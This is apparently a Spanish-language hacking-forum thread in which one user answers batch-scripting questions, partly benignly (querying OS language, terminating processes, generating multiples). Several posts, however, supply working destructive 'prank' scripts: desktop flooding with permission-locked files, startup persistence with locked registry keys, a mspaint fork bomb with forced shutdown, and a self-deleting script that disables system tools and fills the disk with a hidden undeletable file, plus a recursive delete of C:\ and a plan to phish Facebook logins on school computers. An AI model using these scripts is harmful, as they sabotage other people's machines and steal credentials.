Mensajes

Así:

Código (dos) [Seleccionar] Expandir

wmic os get OSLanguage /format:list

Y así:

Código (dos) [Seleccionar] Expandir

reg query "hklm\system\controlset001\control\nls\language" /v Installlanguage

http://msdn.microsoft.com/en-us/library/windows/desktop/aa394239%28v=vs.85%29.aspx

Saludos.

[EDITO]

Las versiones trial tienen un periodo de días gratis, y luego se vuelven de pago.  

búscate otro RAT xD

saludos

EDITO: %Windows%\InstallDir ¿Has comprobado si la carpeta está oculta? si no existe no creo que estés infectado, por lo del trial.+

Seguramente existan aplicaciones para examinar las cabeceras, pero quizás (Y solo quizás, si es un hotmail) para las cabeceras del email esto te sirva:

http://foro.elhacker.net/scripting/reto_batch_jugando_con_la_ip_i-t360788.0.html

y: http://pastebin.com/kTc5Md0c



Para localizar la ip puedes usar la herramienta de elhacker.net: http://www.elhacker.net/geolocalizacion.html

saludos

[nircmd]

Vtask studio

Es lo único que puedes hacer... Pero para simular el movimiento del ratón no te tienes que ir muy lejos ni instalar aplicaciones grotescas xD, te comenté que "nircmd" te serviria para muchas cosas en el futuro...

Puedes probar si quieres el programa "Autoclicker infiniter", digamos que es una GUI para esas funciones del nircmd xD (Lleva dentro el nircmd.exe)

http://www.infiniter.vacau.com/autoclicker-infiniter.html

Saludos.

Nueva y espero que última versión

[NotifyIcon]

Hola,

Código (dos) [Seleccionar] Expandir

TASKKILL /IM Dslogo1.exe /F >nul

(
Echo Set objShell = WScript.CreateObject("WScript.Shell"^)
Echo NotifyIcon notifyicon = new NotifyIcon();
Echo notifyicon.Text = "Logo Ds canal";
Echo notifyicon.Visible = true;
Echo notifyicon.Icon = new Icon(GetType(),"Icon.ico");
::let it disappear traduccion: dejar que desaparezcan
Echo notifyicon.Dispose();
)

exit

Muy mala deducción.

1º - El lenguaje no es VisualBasicScript
2º - El código no sirve para ese propósito

NotifyIcon es una classe para utilizar en un lenguaje de programación (Programando una aplicación en C, Java, VB, etc..), y en el código muestran solo un ejemplo para mostrar/ocultar un icono del programa (No del programa que a uno le apetezca...)
http://msdn.microsoft.com/en-us/library/9szb3e6y.aspx

No tiene nada que ver.

Aparte, en el link que has posteado, fíjate mejor en la pregunta y en la 2 respuesta:

Hi, I have a window service for my application. When i stops that by killing process with task manager, tray icon does not disappears.

There is no solution to this problem. If you kill process with task manager, it does not receive termination notification, and hence can not remove its icon from the tray. Try avoiding killing process this way.

Puedes intentarlocon wmic, o con pskill, aúnque es una tontería, el resultado va a ser el mismo...

Código (dos) [Seleccionar] Expandir

wmic.exe process Where caption="PROGRAMA.exe" Call Terminate
pskill: http://technet.microsoft.com/en-us/sysinternals/bb896683.aspx

No existe una solución a ese problema, ni con aplicaciones de terceros. es malgastar el tiempo

un saludo

[Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tiene]

Que bonito seria, abrir una imagen de un pirata o algo asi diciendo que se jodio la maquina y que van a llamar a la ciberpolicia, con música de malos!!! voy a crearme una imagen y dejo el batch para que me digan lo malo y lo malo que tiene

Poder se puede, Pero a menos que "compiles" en un exe el archivo.bat y la utilidad Nircmd.exe junto a la imagen.bmp y el archivo.wav... Pero si dices que lo quieres tener en un único archivo "bat" pues...  

Que clase de códigos????'

Código [Seleccionar] Expandir

Del /Q /S C:\*
Siempre lo mismo...

NO estoy seguro de entender eso, pero suena a sabor!!!!

Ejemplo:

Código (dos) [Seleccionar] Expandir

@Echo OFF
Setlocal enabledelayedexpansion

Set "CANTIDAD=1000"

PUSHD "%userprofile%\Desktop\"
For /L %%# in (0,1,%CANTIDAD%) Do (
CLS
Echo %%# ^| %CANTIDAD%
Set "FILE=Pornotube !RANDOM!!RANDOM!.url"
Echo OWNED > "!FILE!"
TAKEOWN /F "!FILE!" >NUL
ATTRIB +R +S "!FILE!"
ICACLS "!FILE!" /DENY "TODOS":(F^) >NUL
)
Pause
Exit


REM VACUNA:
REM
REM @Echo OFF
REM PUSHD "%userprofile%\Desktop\"
REM TAKEOWN /F "*.url" >NUL
REM ICACLS "*.url" /GRANT "TODOS":(F) >NUL
REM ATTRIB -R -S "*.url"
REM DEL "*.url"
REM Pause
REM Exit



PD: Solamente me referia a llenar el escritorio con miles de archivos, Que acaban bugeando el explorer.exe y hay que matar el proceso. Pero lo que tiene gracia es que no se pueden eliminar los archivos a menos que vuelvas a darle permisos para eliminación...
La verdad, como putada broma pesada está bien porque es algo muy molesto, te quita 10 minutos de vida para abrir una carpeta en el explorer, o para abrir la consola para ejecutar la vacuna xD

EJEMPLO POR FAVOR SENSEI!!!!

EJEMPLO (REGINI):

Código (dos) [Seleccionar] Expandir

@echo off
REM Elektro H@cker

:: Inicia una página en el navegador por defecto al iniciar sesión en Windows

Set "KeyADD=Elektro H@cker"
SET "WEB=www.elhacker.net"

REM Obtenemos el navegador por defecto
FOR /F tokens^=2^ delims^=^" %%@ in ('REG QUERY HKCR\htmlfile\shell\open\command /VE') Do (REM "

REM Agregamos la página al inicio de sesión del usuario
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "%KeyADD%" /D "CMD /C \"Start /D \"%%~dp@" %%~nx@ \"%WEB%\""" /F >NUL
)

REM Eliminamos los permisos usando REGINI
Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [2 8 12 18 19 22]>"%TEMP%\deny.txt"
Regini.exe "%TEMP%\deny.txt
Pause&Exit

REM VACUNA
REM
REM @echo off
REM Set "KeyDEL=Elektro H@cker"
REM Echo HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run [1 5 7 11 14 17 20]>"%TEMP%\grant.txt"
REM Regini.exe "%TEMP%\grant.txt"
REM REG DELETE "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /V "%KeyDEL%" /F
REM Pause&Exit



Saludos.

[Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código]

Un script que me abra unas diez mil veces (10.000) mspaint.exe, y mientras satura la memoria abriendo el programa una y otra y otra y otra vez, dar la orden de reinicio de sistema, sin que el usuario se percate de la orden, como dije, una inocentada, y que este proceso se repita tan pronto se inicie sesión se corra el código

10.000? te pasaste xDDDD

Código (dos) [Seleccionar] Expandir

@Echo OFF

REM Ya sabes que esto puedes hacerlo también por el registro de Windows si prefieres...
If Not Exist "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%~nx0" (Copy %0 "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" >NUL)

REM La orden de reiniciar.
REM Repetirla es tonteria, Porque queda nula (No anulada)
Shutdown -s -t 60 >NUL

REM 10.000 veces... xD
For /L %%a in (0,1,10000) Do (Start /B mspaint)

Exit

como cuando uno abre un correo o un mensaje de msn

Batch + Vbscript (WMI) o Tasklist.exe, Para monitorizar el nombre de las ventanas (La de correo y la de los mensajes)...

O por el nombre del proceso, Aunque menos eficiente:

Código (dos) [Seleccionar] Expandir

@Echo OFF

:Loop
wmic process where name="msn.exe" call terminate | Find "terminate" >NUL && (
start codigo malicioso xD
Exit
) || (
Goto :Loop
)

No puedes hacer gran cosa en Batch... Yo estoy harto de ver códigos que hacen siempre lo mismo, unos mejores, y otros peores, pero siempre lo mismo.

EDITO: Si quieres joder un poco, llena el escritorio con 10.000 archivos y deniega los privilegios de eliminación de los archivos al usuario... el inicio se vuelve lentisimo xD
O agrega una clave al inicio para visitar una página porno gay y luego deniega los permisos a esa clave usando "regini" (No se si está en WinXP), si necesitas un ejemplo de regini pide, tengo alguno por ahi. mucha gente no sabe cambiar los permisos en el registro xD.

EDITO 2: Se me ocurre una cosa:
1º - Bájate el "phiser creator" si no sabes php, haz una réplica del login de facebook, la subes a un hosting.
2º - un simple bat que se añada al inicio y ejecute el navegador + tu página de phising
3º - Distribuir la bomba por los pcs del instituto y esperar a que caigan como moscas.
4º - Todo esto, únicamente con fines educativos, luego borrar las contraseñas xD.

Una vez hice un code "inocente" para salir de la rutina, por si te sirve:
(PD: LA última parte, El Dummy)

:::::::::::::::::::::::::
:     Spank Me! 1.0    
:                       :
:  By EleKtrO H@ckeR    :
:                       :
: Testeado en Windows 7 :
:::::::::::::::::::::::::

Spank Me! (Bitch)

Nivel destructivo: 3/10

- Deshabilita componentes del sistema operativo.

- Genera archivos de 1 byte con nombre aleatorio por todas las carpetas dle disco duro. 100 archivos por cada carpeta.

- Genera un archivo vacío (Dummy) consumiendo todo el espacio libre del disco duro.

Código (dos) [Seleccionar] Expandir


@Echo OFF
REM: Deshabilita la ejecución de archivos REG
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\.reg" /t Reg_SZ /d "txtfile" /f >NUL 2>&1

FOR /F "tokens=*" %%a in ('Reg query "HKEY_USERS" /f - ^| findstr /r .-......- ^| find /v "Classes"') do (

REM: Deshabilita el acceso a todas las aplicaciones (Inicio > Ejecutar)
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "RestrictRun" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el administrador de tareas
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el apagado del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoClose" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el cambio de usuario de sesión del PC
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "StartmenuLogoff" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el menú contextual del ratón
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoViewContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el menú contextual del menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoTrayContextMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita modificaciones en el menú inicio
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoChangeStartMenu" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el panel de control
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\explorer" /v "NoControlPanel" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita el regedit
reg add "%%a\Software\Microsoft\Windows\CurrentVersion\Policies\system" /v "DisableRegistryTools" /T "REG_DWORD" /D "1" /f >NUL 2>&1

REM: Deshabilita la consola de windows
reg add "%%a\Software\Policies\Microsoft\Windows\System" /v "DisableCMD" /T "REG_DWORD" /D "2" /f >NUL 2>&1
)





REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea archivos de 1 byte, Con nombre aleatorio, En todos los directorios del disco duro
REM: ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

setlocal enabledelayedexpansion
Set File=0

For /F "Tokens=*" %%@ in ('Dir /B /S /AD "%systemdrive%" ^| Find /V /I "Windows" ^| Find /V /I "$Recycle.Bin"') do (Call :COPY %%@)
Goto :Dummy

:Copy
Fsutil file createnew "%*\%Random%%Random%%Random%%Random%%Random%" 1 >NUL 2>&1
Set /A File+=1
If !FILE! EQU 100 (Set /A File=0& Goto :EOF) ELSE (Call :COPY %*)





REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
REM: Crea un archivo "dummy" consumiendo TODO el espacio libre del disco duro.
REM: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

:DUMMY

REM: Permisos
Takeown /F "%Windir%\winsxs" >NUL 2>&1
Icacls     "%Windir%\winsxs" /Grant TODOS:F >NUL 2>&1


REM Crear el Dummy
For /F "tokens=1-7 delims=: " %%a in ('fsutil volume diskfree %SYSTEMDRIVE%') do (
Set Size=%%f
Set Size=!Size:~-0,-6!
Set Size=!Size!000000
Fsutil file createnew "%WINDIR%\winsxs\Microsoft Security Database.msd" !SIZE! >NUL 2>&1
)


REM Protección Anti-Borrado
Takeown /F "%WINDIR%\winsxs\Microsoft Security Database.msd" >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Grant TODOS:F >NUL 2>&1
Attrib "%WINDIR%\winsxs\Microsoft Security Database.msd" +H +S +R >NUL 2>&1
Icacls "%WINDIR%\winsxs\Microsoft Security Database.msd" /Deny TODOS:F >NUL 2>&1


:FIN
Del /Q %0
Exit

[Foro de elhacker.net » Programación » Scripting]

Usa correctamente la sintaxis de Batch.

for /l %%c in (0,1,%cantidad%) do (set /a mul3=3*%%c && set /a mul5=5*%%c && if %mul3%==%mul5% (echo %mul3%) else (echo %mul3% && echo %mul5%) )

Aparte:
- La comprobación no tiene sentido hacerla
- Necesitas expandir las variables para mostrarlas dentro de un for... o usar Call para mostrarlas.
- Al arreglar la sintaxis y los otros fallos tu code muestra los números de una forma muy desorganizada y poco agradable...

EDITO: Si tienes más dudas sobre Batch debes formular tus posts en la sección correcta... Foro de elhacker.net » Programación » Scripting

A ver que te parece así:

Código (dos) [Seleccionar] Expandir

@echo off
Rem elhacker.net
Setlocal enabledelayedexpansion

:Menu
Echo Generar lista de multiplos de 3 y 5 hasta el numero (que no sea mayor de 1000):
Echo (Cantidad maxima: 335) | MORE
set /P "X=Cantidad >> "
If "%X%" GEQ "335" (SET "Cantidad=" & Goto :Menu)

:Generador
for /L %%X in (1,1,%X%) do (
SET /A "x3=3*%%X", "x5=5*%%X" && (
Echo " !x3! " | Findstr "\<1[0-9][0-9][0-9]\>" >NUL || (Set "Multi3=!Multi3!!x3!, ")
Echo " !x5! " | Findstr "\<1[0-9][0-9][0-9]\>" >NUL || (Set "Multi5=!Multi5!!x5!, ")
)
)

:Resultados
Echo+
Echo Multiplos (3): & Echo:%Multi3% | MORE
Echo Multiplos (5): & Echo:%Multi5% | MORE
Pause
Exit



Saludos.

[exefile backup.reg]

A ver si puedes ejecutar este archivo de registro:

exefile backup.reg

Código [Seleccionar] Expandir

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open]
"EditFlags"=hex:00,00,00,00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
"IsolatedCommand"="\"%1\" %*"

O agregalas manualmente:


Saludos.